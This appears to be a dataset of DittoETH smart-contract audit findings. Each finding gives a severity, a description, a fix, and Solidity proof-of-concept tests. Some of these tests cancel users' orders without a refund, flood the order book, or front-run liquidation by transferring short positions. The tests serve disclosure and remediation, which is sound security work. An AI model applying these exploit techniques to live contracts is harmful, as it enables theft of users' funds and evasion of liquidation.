active bids :\\n        STypes.Order[] memory Afterbids = diamond.getBids(asset);\\n        // notice that we were able to delete all the bids even though there were unActive IDs to be reused\\n        assertTrue(Afterbids.length == 0);\\n        // also notice that the owners of these orders did not get refunded the zeth that was taken from them when they created these orders\\n\\n        for (uint i; i<bidders.length;i++){\\n            // check that there is no refund for the users: \\n            uint ethUser = diamond.getZethBalance(vault,bidders[i]);\\n            console.log('balance of : ', bidders[i],ethUser);\\n            assertEq(ethUser ,0);\\n        }\\n        // we can also cancel the shorts and the asks; to keep the POC short, the idea is the same: you can cancel all the orders of a market once it reaches 65000\\n        assertEq(diamond.getShorts(asset).length,1);\\n        diamond.cancelOrderFarFromOracle(asset, O.LimitShort, 64999, 1);\\n        assertEq(diamond.getShorts(asset).length,0);\\n\\n    }\\n    function canclebid(uint16 id) public {\\n        diamond.cancelOrderFarFromOracle(asset, O.LimitBid, id, 1);\\n    }\\n\\n\\n}\\n```\\n\\nConsole output after running the test:\\n```\\n [PASS] test_cancleOrders() (gas: 1218326)\\nLogs:\\n  balance of : 0x000000000000000000000000000000000006A4E9 0\\n  balance of : 0x00000000000000000000000000000000193d114b 0\\n  balance of : 0x000000000000000000000000000000000007f87E 0\\n\\nTest result: ok. 1 passed; 0 failed; 0 skipped; finished in 222.12ms\\n\\nRan 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)\\n```\\n\\nFor the creation of a bunch of tiny asks:\\n```\\n[PASS] test_fillWithAsks() (gas: 860940067)\\nLogs:\\n  tiny asks created :  1000\\n  hack cost asset 10000000000000 (which is less than 1 cusd) \\n\\nTest result: ok. 1 passed; 0 failed; 0 skipped; finished in 7.17s\\n \\nRan 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)\\n```\\n\\nImpact:\\nUsers will lose their `zeth` or `Erc` pegged asset depending on the order type.\\nAny type of order in this market (shorts, asks, bids) can be affected and cancelled, even if there are a lot of non-active ids to be reused.\\nAll the orders in a market can be cancelled without refunding the orders' creators.\\nTools used:\\nManual review
Users Lose Funds and Market Functionality Breaks When Market Reaches 65k Id\\nBefore cancelling the orders, check that there are no order ids waiting to be reused, or that the difference between the current orderId (s.asset[asset].orderId) and the ids available for reuse (behind the HEAD) of this market is greater than 65000.\\n```\\n// pseudocode recommendation, but it really depends on the team how to handle this:\\n if (s.asset[asset].orderId - (shorts.unActiveIds + asks.unActiveIds + bids.unActiveIds) < 65000) revert;\\n```\\n
null
```\\n// SPDX-License-Identifier: GPL-3.0-only\\npragma solidity 0.8.21;\\n\\nimport {Errors} from "contracts/libraries/Errors.sol";\\nimport {Events} from "contracts/libraries/Events.sol";\\nimport {STypes, MTypes, O} from "contracts/libraries/DataTypes.sol";\\nimport {Constants} from "contracts/libraries/Constants.sol";\\nimport "forge-std/console.sol";\\nimport {OBFixture} from "test/utils/OBFixture.sol";\\n// import {console} from "contracts/libraries/console.sol";\\n\\ncontract POC is OBFixture {\\n    address[3] private bidders = [address(435433), address(423432523), address(522366)];\\n    address[3] private shorters = [address(243422243242), address(52353646324532), address(40099)];\\n    address attacker = address(3234);\\n    function setUp() public override {\\n        super.setUp();\\n    }\\n\\n    // an attacker can fill the order book with a bunch of asks that have a very high price and a tiny amount\\n    function test_fillWithAsks() public {\\n        // create a bunch of asks with a high price:\\n        depositUsd(attacker, DEFAULT_AMOUNT * 10000);\\n        uint balanceAssetBefore = diamond.getAssetBalance(asset,attacker);\\n        // minAsk = 0.0001 ether . 0.0001 ether = x * 1 , x =0.0001 ether * 1 ether\\n        vm.startPrank(attacker);\\n        for (uint i ; i< 1000 ;i++){\\n            createLimitAsk( 10**24, 10**10); \\n        }\\n        vm.stopPrank();\\n        STypes.Order[] memory asks = diamond.getAsks(asset);\\n        console.log("tiny asks created : ", asks.length);\\n        console.log( "hack cost asset", balanceAssetBefore - diamond.getAssetBalance(asset,attacker));\\n\\n    }\\n    function test_cancleOrders() public {\\n        //set the asset orderId to 64998\\n        diamond.setOrderIdT(asset,64998);\\n        // create multiple bids and 1 short\\n        fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, bidders[0]); // id 64998\\n        fundLimitShortOpt(uint80(DEFAULT_PRICE)*4, DEFAULT_AMOUNT, shorters[0]); //id 64999\\n        fundLimitBidOpt(DEFAULT_PRICE*2, DEFAULT_AMOUNT, bidders[1]); // id 65000\\n        fundLimitBidOpt(DEFAULT_PRICE*3 , DEFAULT_AMOUNT, bidders[2]); //id 65001\\n        /* now we have the lists like this :\\n        - for bids : Head <- Head <->65001<->65000<->64998->Tail\\n        - for shorts: Head <- Head <->64999->Tail\\n        */\\n\\n        // let's cancel all the bids:\\n        canclebid(64998);\\n        // - now : Head <-64998<-> Head <->65001<->65000->Tail\\n        uint s1 = vm.snapshot();\\n        vm.revertTo(s1);\\n        canclebid(65000);\\n        // - now : Head <-64998<->65000<-> Head <->65001->Tail\\n        uint s2 = vm.snapshot();\\n        vm.revertTo(s2);\\n        canclebid(65001);\\n        // - now : Head <-64998<->65000<->65001<-> Head ->Tail\\n        // let's check the active bids :\\n        STypes.Order[] memory Afterbids = diamond.getBids(asset);\\n        // notice that we were able to delete all the bids even though there were unActive IDs to be reused\\n        assertTrue(Afterbids.length == 0);\\n        // also notice that the owners of these orders did not get refunded the zeth that was taken from them when they created these orders\\n\\n        for (uint i; i<bidders.length;i++){\\n            // check that there is no refund for the users: \\n            uint ethUser = diamond.getZethBalance(vault,bidders[i]);\\n            console.log('balance of : ', bidders[i],ethUser);\\n            assertEq(ethUser ,0);\\n        }\\n        // we can also cancel the shorts and the asks; to keep the POC short, the idea is the same: you can cancel all the orders of a market once it reaches 65000\\n        assertEq(diamond.getShorts(asset).length,1);\\n        diamond.cancelOrderFarFromOracle(asset, O.LimitShort, 64999, 1);\\n        assertEq(diamond.getShorts(asset).length,0);\\n\\n    }\\n    function 
diamond.cancelOrderFarFromOracle(asset, O.LimitBid, id, 1);\\n }\\n\\n\\n}\\n```\\n
Possible DOS on deposit(), withdraw() and unstake() for BridgeReth, leading to user loss of funds
medium
Future changes to the deposit delay on rETH tokens would prevent DittoETH users from using deposit(), withdraw() and unstake() for BridgeReth, which would make transferring and burning rETH impractical, leading to user fund losses.\\nRocketPool rETH tokens have a deposit delay that prevents any user who has recently deposited from transferring or burning tokens. In the past this delay was set to 5760 blocks mined (approx. 19h, considering one block per 12s). This delay can prevent DittoETH users from transferring if another user staked recently.\\nFile: RocketTokenRETH.sol\\n```\\n    // This is called by the base ERC20 contract before all transfer, mint, and burns\\n    function _beforeTokenTransfer(address from, address, uint256) internal override {\\n        // Don't run check if this is a mint transaction\\n        if (from != address(0)) {\\n            // Check which block the user's last deposit was\\n            bytes32 key = keccak256(abi.encodePacked("user.deposit.block", from));\\n            uint256 lastDepositBlock = getUint(key);\\n            if (lastDepositBlock > 0) {\\n                // Ensure enough blocks have passed\\n                uint256 depositDelay = getUint(keccak256(abi.encodePacked(keccak256("dao.protocol.setting.network"), "network.reth.deposit.delay")));\\n                uint256 blocksPassed = block.number.sub(lastDepositBlock);\\n                require(blocksPassed > depositDelay, "Not enough time has passed since deposit");\\n                // Clear the state as it's no longer necessary to check this until another deposit is made\\n                deleteUint(key);\\n            }\\n        }\\n    }\\n```\\n\\nAny future changes made to this delay by the admins could potentially lead to a denial-of-service attack on the `BridgeRouterFacet::deposit` and `BridgeRouterFacet::withdraw` mechanism for the rETH bridge.
Possible DOS on deposit(), withdraw() and unstake() for BridgeReth, leading to user loss of funds\\nConsider modifying the Reth bridge to obtain rETH only through the UniswapV3 pool; on average users will get slightly less rETH due to slippage, but this avoids any future issues with the deposit delay mechanism. A sketch of this deposit path follows below.
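A minimal sketch of the suggested deposit path, assuming the canonical Uniswap V3 `ISwapRouter` (v1); the `swapRouter`, `WETH` and `RETH` variables, the fee tier and the function name are assumptions:\\n```\\nimport {ISwapRouter} from "@uniswap/v3-periphery/contracts/interfaces/ISwapRouter.sol";\\n\\nfunction depositEthViaUniswap(uint256 minRethOut) external payable returns (uint256 rethOut) {\\n    // Swap ETH for rETH on the Uniswap V3 pool instead of rocketDepositPool,\\n    // so the rETH received never carries the deposit delay.\\n    rethOut = swapRouter.exactInputSingle{value: msg.value}(\\n        ISwapRouter.ExactInputSingleParams({\\n            tokenIn: WETH,                 // the router wraps the attached ETH\\n            tokenOut: RETH,\\n            fee: 500,                      // assumed fee tier of the rETH/WETH pool\\n            recipient: address(this),\\n            deadline: block.timestamp,\\n            amountIn: msg.value,\\n            amountOutMinimum: minRethOut,  // slippage protection\\n            sqrtPriceLimitX96: 0\\n        })\\n    );\\n}\\n```\\n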
Currently, the delay is set to zero, but if RocketPool admins decide to change this value in the future, it could cause issues. Specifically, protocol users' staking actions could prevent other users from unstaking for a few hours. Given that many users call the stake function throughout the day, the delay would constantly reset, making the unstaking mechanism unusable. It's important to note that this only occurs when stake() is used through the rocketDepositPool route. If rETH is obtained from the Uniswap pool, the delay is not affected.\\nAll the ETH swapped for rETH by calling `BridgeReth::depositEth` would become irrecoverable, leading to a user bank run on DittoETH so as not to be harmed by this risk being externalized to all the users that have deposited.
```\\n // This is called by the base ERC20 contract before all transfer, mint, and burns\\n function _beforeTokenTransfer(address from, address, uint256) internal override {\\n // Don't run check if this is a mint transaction\\n if (from != address(0)) {\\n // Check which block the user's last deposit was\\n bytes32 key = keccak256(abi.encodePacked("user.deposit.block", from));\\n uint256 lastDepositBlock = getUint(key);\\n if (lastDepositBlock > 0) {\\n // Ensure enough blocks have passed\\n uint256 depositDelay = getUint(keccak256(abi.encodePacked(keccak256("dao.protocol.setting.network"), "network.reth.deposit.delay")));\\n uint256 blocksPassed = block.number.sub(lastDepositBlock);\\n require(blocksPassed > depositDelay, "Not enough time has passed since deposit");\\n // Clear the state as it's no longer necessary to check this until another deposit is made\\n deleteUint(key);\\n }\\n }\\n }\\n```\\n
ETH cannot always be unstaked using Rocket Pool
low
The protocol lets users unstake Ethereum using any bridge they want. Rocket Pool may not have enough ETH to satisfy unstake transactions, this will cause the transaction to revert.\\nWhen users try to unstake ETH using Rocket Pool, the transaction may revert because Rocket Pool may not have enough ETH in its deposit pool and rEth contract to satisfy the unstake request. Rocket pool sources ETH for unstaking from the rEth contract and deposit pool. When they are empty it cannot satisfy unstake requests. More information can be found in the Unstake section of the rocketPool documentation.\\nThe pools have been empty before. Here's a proof of concept of failed withdrawals when Rocket Pool's rEth contract and deposit pool were empty at block 15361748.\\n```\\n function testWithdrawETHfromRocketPool() public{\\n string memory MAINNET_RPC_URL = vm.envString("MAINNET_RPC_URL");\\n uint256 mainnetFork = vm.createFork(MAINNET_RPC_URL, 15361748);\\n\\n RocketTokenRETHInterface rEth = RocketTokenRETHInterface(0xae78736Cd615f374D3085123A210448E74Fc6393);\\n vm.selectFork(mainnetFork);\\n uint totalCollateral = rEth.getTotalCollateral();\\n assertEq(totalCollateral, 0); // pools are empty\\n\\n address owner = 0x50A78DFb9F5CC22ac8ffA90FA2B6C595881CCb97; // has rEth at block 15361748\\n uint rEthBalance = rEth.balanceOf(owner);\\n assertGt(rEthBalance, 0);\\n \\n vm.expectRevert("Insufficient ETH balance for exchange");\\n vm.prank(owner); \\n rEth.burn(rEthBalance);\\n }\\n```\\n
Check if Rocket Pool has enough ETH; if it doesn't, rETH can be exchanged for ETH on a DEX and sent to the user (see the sketch below).
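A minimal sketch of that fallback inside the bridge's withdraw path; the DEX helper and the `minEthOut` slippage bound are hypothetical placeholders:\\n```\\nuint256 ethOut = reth.getEthValue(rethAmount);\\nif (reth.getTotalCollateral() >= ethOut) {\\n    // Deposit pool + rETH contract can cover the redemption: burn directly\\n    reth.burn(rethAmount);\\n} else {\\n    // Otherwise sell the rETH for ETH on a DEX instead of reverting\\n    _swapRethForEthOnDex(rethAmount, minEthOut); // hypothetical helper\\n}\\n```\\n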
If Rocket Pool's rEth contract and deposit Pool do not have enough ETH to satisfy an unstake transaction the transaction will revert.
```\\n function testWithdrawETHfromRocketPool() public{\\n string memory MAINNET_RPC_URL = vm.envString("MAINNET_RPC_URL");\\n uint256 mainnetFork = vm.createFork(MAINNET_RPC_URL, 15361748);\\n\\n RocketTokenRETHInterface rEth = RocketTokenRETHInterface(0xae78736Cd615f374D3085123A210448E74Fc6393);\\n vm.selectFork(mainnetFork);\\n uint totalCollateral = rEth.getTotalCollateral();\\n assertEq(totalCollateral, 0); // pools are empty\\n\\n address owner = 0x50A78DFb9F5CC22ac8ffA90FA2B6C595881CCb97; // has rEth at block 15361748\\n uint rEthBalance = rEth.balanceOf(owner);\\n assertGt(rEthBalance, 0);\\n \\n vm.expectRevert("Insufficient ETH balance for exchange");\\n vm.prank(owner); \\n rEth.burn(rEthBalance);\\n }\\n```\\n
Users can avoid liquidation while being under the primary liquidation ratio if on the last short record
high
The protocol permits users to maintain up to 254 concurrent short records. When this limit is reached, any additional orders are appended to the final position, rather than creating a new one. A short record is subject to flagging if it breaches the primary liquidation ratio set by the protocol, leading to potential liquidation if it remains below the threshold for a predefined period.\\nThe vulnerability emerges from the dependency of liquidation times on the `updatedAt` value of shorts. For the last short record, the appending of any new orders provides an alternative pathway for updating the `updatedAt` value of shorts, enabling users to circumvent liquidation by submitting minimal shorts to block liquidation by adjusting the time difference, thus avoiding liquidation even when they do not meet the collateral requirements for a healthy state.\\nlets take a look at the code to see how this works.\\nFlagging of Short Record:\\nThe `flagShort` function allows a short to be flagged if it's under `primaryLiquidationCR`, subsequently invoking `setFlagger` which updates the short's `updatedAt` timestamp to the current time.\\n```\\nfunction flagShort(address asset, address shorter, uint8 id, uint16 flaggerHint)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, shorter, id)\\n {\\n // initial code\\n\\n short.setFlagger(cusd, flaggerHint);\\n emit Events.FlagShort(asset, shorter, id, msg.sender, adjustedTimestamp);\\n }\\n```\\n\\nLiquidation Eligibility Check:\\nThe `_canLiquidate` function assesses whether the flagged short is still under `primaryLiquidationCR` after a certain period and if it's eligible for liquidation, depending on the `updatedAt` timestamp and various liquidation time frames.\\n```\\nfunction _canLiquidate(MTypes.MarginCallPrimary memory m)\\n private\\n view\\n returns (bool)\\n {\\n // Initial code\\n\\n uint256 timeDiff = LibOrders.getOffsetTimeHours() - m.short.updatedAt;\\n uint256 resetLiquidationTime = LibAsset.resetLiquidationTime(m.asset);\\n\\n if (timeDiff >= resetLiquidationTime) {\\n return false;\\n } else {\\n uint256 secondLiquidationTime = LibAsset.secondLiquidationTime(m.asset);\\n bool isBetweenFirstAndSecondLiquidationTime = timeDiff\\n > LibAsset.firstLiquidationTime(m.asset) && timeDiff <= secondLiquidationTime\\n && s.flagMapping[m.short.flaggerId] == msg.sender;\\n bool isBetweenSecondAndResetLiquidationTime =\\n timeDiff > secondLiquidationTime && timeDiff <= resetLiquidationTime;\\n if (\\n !(\\n (isBetweenFirstAndSecondLiquidationTime)\\n || (isBetweenSecondAndResetLiquidationTime)\\n )\\n ) {\\n revert Errors.MarginCallIneligibleWindow();\\n }\\n\\n return true;\\n }\\n }\\n}\\n```\\n\\nShort Record Merging:\\nFor the last short record, the `fillShortRecord` function combines new matched shorts with the existing one, invoking the `merge` function, which updates the `updatedAt` value to the current time.\\n```\\nfunction fillShortRecord(\\n address asset,\\n address shorter,\\n uint8 shortId,\\n SR status,\\n uint88 collateral,\\n uint88 ercAmount,\\n uint256 ercDebtRate,\\n uint256 zethYieldRate\\n ) internal {\\n AppStorage storage s = appStorage();\\n\\n uint256 ercDebtSocialized = ercAmount.mul(ercDebtRate);\\n uint256 yield = collateral.mul(zethYieldRate);\\n\\n STypes.ShortRecord storage short = s.shortRecords[asset][shorter][shortId];\\n if (short.status == SR.Cancelled) {\\n short.ercDebt = short.collateral = 0;\\n }\\n\\n short.status = status;\\n LibShortRecord.merge(\\n short,\\n ercAmount,\\n 
ercDebtSocialized,\\n collateral,\\n yield,\\n LibOrders.getOffsetTimeHours()\\n );\\n }\\n```\\n\\nIn the merge function we see that we update the updatedAt value to creationTime which is LibOrders.getOffsetTimeHours().\\n```\\nfunction merge(\\n STypes.ShortRecord storage short,\\n uint88 ercDebt,\\n uint256 ercDebtSocialized,\\n uint88 collateral,\\n uint256 yield,\\n uint24 creationTime\\n ) internal {\\n // Resolve ercDebt\\n ercDebtSocialized += short.ercDebt.mul(short.ercDebtRate);\\n short.ercDebt += ercDebt;\\n short.ercDebtRate = ercDebtSocialized.divU64(short.ercDebt);\\n // Resolve zethCollateral\\n yield += short.collateral.mul(short.zethYieldRate);\\n short.collateral += collateral;\\n short.zethYieldRate = yield.divU80(short.collateral);\\n // Assign updatedAt\\n short.updatedAt = creationTime;\\n }\\n```\\n\\nThis means that even if the position was flagged and is still under the `primaryLiquidationCR`, it cannot be liquidated as the `updatedAt` timestamp has been updated, making the time difference not big enough.\\n
Impose stricter conditions for updating the last short record when the position is flagged and remains under the `primaryLiquidationCR` post-merge, similar to how the `combineShorts` function works.\\n```\\nfunction createShortRecord(\\n address asset,\\n address shorter,\\n SR status,\\n uint88 collateral,\\n uint88 ercAmount,\\n uint64 ercDebtRate,\\n uint80 zethYieldRate,\\n uint40 tokenId\\n ) internal returns (uint8 id) {\\n AppStorage storage s = appStorage();\\n\\n // Initial code\\n\\n } else {\\n // All shortRecordIds used, combine into max shortRecordId\\n id = Constants.SHORT_MAX_ID;\\n fillShortRecord(\\n asset,\\n shorter,\\n id,\\n status,\\n collateral,\\n ercAmount,\\n ercDebtRate,\\n zethYieldRate\\n );\\n\\n // If the short was flagged, ensure resulting c-ratio > primaryLiquidationCR\\n if (Constants.SHORT_MAX_ID.shortFlagExists) {\\n if (\\n Constants.SHORT_MAX_ID.getCollateralRatioSpotPrice(\\n LibOracle.getSavedOrSpotOraclePrice(_asset)\\n ) < LibAsset.primaryLiquidationCR(_asset)\\n ) revert Errors.InsufficientCollateral();\\n // Resulting combined short has sufficient c-ratio to remove flag\\n Constants.SHORT_MAX_ID.resetFlag();\\n }\\n }\\n }\\n```\\n
This allows a user with a position under the primaryLiquidationCR to avoid primary liquidation even if the short is in the valid time ranges for liquidation.
```\\nfunction flagShort(address asset, address shorter, uint8 id, uint16 flaggerHint)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, shorter, id)\\n {\\n // initial code\\n\\n short.setFlagger(cusd, flaggerHint);\\n emit Events.FlagShort(asset, shorter, id, msg.sender, adjustedTimestamp);\\n }\\n```\\n
Incorrect require in setter
low
There are 3 setters in `OwnerFacet.sol` whose require statement doesn't match the error message.\\n`_setInitialMargin`, `_setPrimaryLiquidationCR` and `_setSecondaryLiquidationCR` will revert for the value 100 with the error message `"below 1.0"`, which is incorrect: 100 is exactly 1.0, not below it.\\nInstances (3):\\n```\\n    function _setInitialMargin(address asset, uint16 value) private {\\n        require(value > 100, "below 1.0"); // @audit a value of 100 is 1.0, so the check and the message disagree\\n        s.asset[asset].initialMargin = value;\\n        require(LibAsset.initialMargin(asset) < Constants.CRATIO_MAX, "above max CR");\\n    }\\n\\n    function _setPrimaryLiquidationCR(address asset, uint16 value) private {\\n        require(value > 100, "below 1.0"); // @audit a value of 100 is 1.0, so the check and the message disagree\\n        require(value <= 500, "above 5.0");\\n        require(value < s.asset[asset].initialMargin, "above initial margin");\\n        s.asset[asset].primaryLiquidationCR = value;\\n    }\\n\\n    function _setSecondaryLiquidationCR(address asset, uint16 value) private {\\n        require(value > 100, "below 1.0"); // @audit a value of 100 is 1.0, so the check and the message disagree\\n        require(value <= 500, "above 5.0");\\n        require(value < s.asset[asset].primaryLiquidationCR, "above primary liquidation");\\n        s.asset[asset].secondaryLiquidationCR = value;\\n    }\\n```\\n\\nBy contrast, in the functions below this check is done correctly:\\n```\\n    function _setForcedBidPriceBuffer(address asset, uint8 value) private {\\n        require(value >= 100, "below 1.0");\\n        require(value <= 200, "above 2.0");\\n        s.asset[asset].forcedBidPriceBuffer = value;\\n    }\\n\\n    function _setMinimumCR(address asset, uint8 value) private {\\n        require(value >= 100, "below 1.0");\\n        require(value <= 200, "above 2.0");\\n        s.asset[asset].minimumCR = value;\\n        require(\\n            LibAsset.minimumCR(asset) < LibAsset.secondaryLiquidationCR(asset),\\n            "above secondary liquidation"\\n        );\\n    }\\n```\\n
Change the comparison to `value >= 100`, as done in `_setForcedBidPriceBuffer` and `_setMinimumCR`, so that the check matches the `"below 1.0"` message and a value of exactly 100 (1.0) is accepted.
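Sketch of the adjusted check for one of the three setters (the same one-line change applies to the other two):\\n```\\n    function _setPrimaryLiquidationCR(address asset, uint16 value) private {\\n-        require(value > 100, "below 1.0");\\n+        require(value >= 100, "below 1.0"); // 100 == 1.0 is now accepted, matching the message\\n        require(value <= 500, "above 5.0");\\n        require(value < s.asset[asset].initialMargin, "above initial margin");\\n        s.asset[asset].primaryLiquidationCR = value;\\n    }\\n```\\n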
The incorrect bound in the require statement restricts the precision of these parameters: it is impossible to input a value of exactly 100.
```\\n    function _setInitialMargin(address asset, uint16 value) private {\\n        require(value > 100, "below 1.0"); // @audit a value of 100 is 1.0, so the check and the message disagree\\n        s.asset[asset].initialMargin = value;\\n        require(LibAsset.initialMargin(asset) < Constants.CRATIO_MAX, "above max CR");\\n    }\\n\\n    function _setPrimaryLiquidationCR(address asset, uint16 value) private {\\n        require(value > 100, "below 1.0"); // @audit a value of 100 is 1.0, so the check and the message disagree\\n        require(value <= 500, "above 5.0");\\n        require(value < s.asset[asset].initialMargin, "above initial margin");\\n        s.asset[asset].primaryLiquidationCR = value;\\n    }\\n\\n    function _setSecondaryLiquidationCR(address asset, uint16 value) private {\\n        require(value > 100, "below 1.0"); // @audit a value of 100 is 1.0, so the check and the message disagree\\n        require(value <= 500, "above 5.0");\\n        require(value < s.asset[asset].primaryLiquidationCR, "above primary liquidation");\\n        s.asset[asset].secondaryLiquidationCR = value;\\n    }\\n```\\n
Unhandled Chainlink revert in case its multisigs block access to price feeds
low
In some extreme cases, oracles can be taken offline or token prices can fall to zero. Therefore, a call to `latestRoundData` could potentially revert, and none of the circuit breakers would fall back to query any prices automatically.\\nAccording to Ditto's documentation in https://dittoeth.com/technical/oracles, there are two circuit breaking events if Chainlink data becomes unusable: Invalid Fetch Data and Price Deviation.\\nThe issue arises from the possibility that Chainlink multisignature entities might intentionally block access to the price feed. In such a scenario, the invocation of the `latestRoundData` function could potentially trigger a revert, rendering the circuit-breaking events ineffective in mitigating the consequences, as they would be incapable of querying any price data or specific information.\\nIn certain exceptional circumstances, Chainlink has already taken the initiative to temporarily suspend specific oracles. As an illustrative instance, during the UST collapse incident, Chainlink opted to halt the UST/ETH price oracle to prevent the dissemination of erroneous data to various protocols.\\nAdditionally, these dangerous oracle scenarios are very well documented by OpenZeppelin in https://blog.openzeppelin.com/secure-smart-contract-guidelines-the-dangers-of-price-oracles. For our context:\\n"While currently there's no whitelisting mechanism to allow or disallow contracts from reading prices, powerful multisigs can tighten these access controls. In other words, the multisigs can immediately block access to price feeds at will. Therefore, to prevent denial of service scenarios, it is recommended to query ChainLink price feeds using a defensive approach with Solidity's try/catch structure. In this way, if the call to the price feed fails, the caller contract is still in control and can handle any errors safely and explicitly".\\nAlthough a fallback mechanism, specifically the TWAP, is in place to uphold system functionality in the event of Chainlink failure, it is worth noting that Ditto's documentation explicitly underscores its substantial reliance on oracles. Consequently, it is imperative to address this issue comprehensively within the codebase, given that it pertains to one of the fundamental functionalities of the environment.\\nAs mentioned above, in order to mitigate the potential risks associated with a denial-of-service scenario, it is advisable to employ a `try-catch` mechanism when querying Chainlink prices in the function `getOraclePrice` under LibOracle.sol. 
Through this approach, in the event of a failure in the invocation of the price feed, the caller contract retains control and can manage any errors safely and explicitly.\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/main/contracts/libraries/LibOracle.sol#L25-L32\\n```\\n        (\\n            uint80 baseRoundID,\\n            int256 basePrice,\\n            /*uint256 baseStartedAt*/\\n            ,\\n            uint256 baseTimeStamp,\\n            /*uint80 baseAnsweredInRound*/\\n        ) = baseOracle.latestRoundData();\\n```\\n\\nHere I enumerate some of the core functions that will be affected in case of an unhandled oracle revert:\\nFunction createMarket under OwnerFacet.sol:\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/main/contracts/facets/OwnerFacet.sol#L47-L68\\nFunction updateOracleAndStartingShort under LibOrders.sol:\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/main/contracts/libraries/LibOrders.sol#L812-L816\\nFunction getShortIdAtOracle under ViewFacet.sol:\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/main/contracts/facets/ViewFacet.sol#L173-L187
Encase the invocation of the function `latestRoundData()` within a `try-catch` construct instead of invoking it directly. In circumstances where the function call results in a revert, the catch block may serve the purpose of invoking an alternative oracle or managing the error in a manner that is deemed appropriate for the system.
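A minimal sketch of this defensive pattern, assuming the standard `AggregatorV3Interface` return signature; both helper names are hypothetical placeholders:\\n```\\ntry baseOracle.latestRoundData() returns (\\n    uint80 baseRoundID,\\n    int256 basePrice,\\n    uint256, /* baseStartedAt */\\n    uint256 baseTimeStamp,\\n    uint80 /* baseAnsweredInRound */\\n) {\\n    // Feed answered: run the existing staleness / deviation circuit breakers\\n    return _checkAndReturnPrice(baseRoundID, basePrice, baseTimeStamp); // hypothetical helper\\n} catch {\\n    // Feed reverted (e.g. access blocked by the multisig): fall back to the TWAP path\\n    return _twapFallbackPrice(); // hypothetical helper wrapping estimateWETHInUSDC\\n}\\n```\\n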
If a configured Oracle feed has malfunctioned or ceased operating, it will produce a revert when checking for `latestRoundData` that would need to be manually handled by the system.
```\\n (\\n uint80 baseRoundID,\\n int256 basePrice,\\n /*uint256 baseStartedAt*/\\n ,\\n uint256 baseTimeStamp,\\n /*uint80 baseAnsweredInRound*/\\n ) = baseOracle.latestRoundData();\\n```\\n
Owner of a bad ShortRecord can front-run flagShort calls AND liquidateSecondary and prevent liquidation
high
A shorter can keep an unhealthy short position open by minting an NFT of it and front-running attempts to liquidate it with a transfer of this NFT (which transfers the short position to the new owner).\\nA Short Record (SR) is a struct representing a short position that has been opened by a user. It holds different pieces of information, such as how much collateral is backing the short and how much debt it owes (this ratio is called the Collateral Ratio, or CR). At any time, any user can flag someone else's SR as "dangerous" if its debt grows too much compared to its collateral. This operation is accessible through `MarginCallPrimaryFacet::flagShort`, which checks through the `onlyValidShortRecord` modifier that the SR isn't `Cancelled`. If the SR is valid, its debt/collateral ratio is verified and, if it is below a specific threshold, the SR is flagged. But that also means that if an SR is considered invalid, it cannot be flagged. And there is a way for the owner of an SR to cancel their SR while still holding the position.\\nThe owner of an SR can mint an NFT to represent it and make it transferable. This is done in 5 steps:\\n`TransferFrom` verifies the usual things regarding the NFT (ownership, allowance, valid receiver...)\\n`LibShortRecord::transferShortRecord` is called\\n`transferShortRecord` verifies that the SR is not `flagged` nor `Cancelled`\\nThe SR is deleted (setting its status to Cancelled)\\nA new SR is created with the same parameters, but owned by the receiver.\\nNow, let's see what would happen if Alice has an SR_1 with a bad CR, and Bob tries to flag it.\\nBob calls flagShort on SR_1; the tx is sent to the mempool\\nAlice is watching the mempool and doesn't want her SR to be flagged:\\nShe front-runs Bob's tx with a transfer of her SR_1 to another of the addresses she controls\\nNow Bob's tx will be executed after Alice's tx:\\nSR_1 is "deleted" and its status set to `Cancelled`\\nBob's tx is executed, and `flagShort` reverts because of `onlyValidShortRecord`\\nAlice can do this trick again to keep her undercollateralized SR until it becomes even more dangerous\\nBut this is not over:\\nEven when her CR drops dangerously (CR < 1.5), `liquidateSecondary` is also DoS'd, as it has the same check for `SR.Cancelled`\\nAdd these tests to `ERC721Facet.t.sol`:\\nFront-running flag\\n```\\n    function test_audit_frontrunFlagShort() public {\\n        address alice = makeAddr("Alice"); //Alice will front-run Bob's attempt to flag her short\\n        address aliceSecondAddr = makeAddr("AliceSecondAddr");\\n        address bob = makeAddr("Bob"); //Bob will try to flag Alice's short \\n        address randomUser = makeAddr("randomUser"); //regular user who created a bid order\\n        \\n        //A random user creates a bid, Alice creates a short, which will match with the user's bid\\n        fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, randomUser);\\n        fundLimitShortOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, alice);\\n        //Alice then mints the NFT associated with the SR so that it can be transferred\\n        vm.prank(alice);\\n        diamond.mintNFT(asset, Constants.SHORT_STARTING_ID);\\n\\n        //ETH price drops from 4000 to 2666, making Alice's short flaggable because it is < LibAsset.primaryLiquidationCR(asset)\\n        setETH(2666 ether);\\n        \\n        // Alice saw Bob's attempt to flag her short, so she front-runs him and transfers the SR\\n        vm.prank(alice);\\n        diamond.transferFrom(alice, aliceSecondAddr, 1);\\n        \\n        //Bob's attempt reverts because the transfer of the short by Alice changed the short status to SR.Cancelled\\n        vm.prank(bob);\\n        vm.expectRevert(Errors.InvalidShortId.selector);\\n        diamond.flagShort(asset, alice, Constants.SHORT_STARTING_ID, Constants.HEAD);\\n    } \\n```\\n\\nFront-running liquidateSecondary\\n```\\n    function test_audit_frontrunPreventFlagAndSecondaryLiquidation() public {\\n        address alice = makeAddr("Alice"); //Alice will front-run Bob's attempt to flag her short\\n        address aliceSecondAddr = makeAddr("AliceSecondAddr");\\n        address aliceThirdAddr = makeAddr("AliceThirdAddr");\\n        address bob = makeAddr("Bob"); //Bob will try to flag Alice's short \\n        address randomUser = makeAddr("randomUser"); //regular user who created a bid order\\n        \\n        //A random user creates a bid, Alice creates a short, which will match with the user's bid\\n        fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, randomUser);\\n        fundLimitShortOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, alice);\\n        //Alice then mints the NFT associated with the SR so that it can be transferred\\n        vm.prank(alice);\\n        diamond.mintNFT(asset, 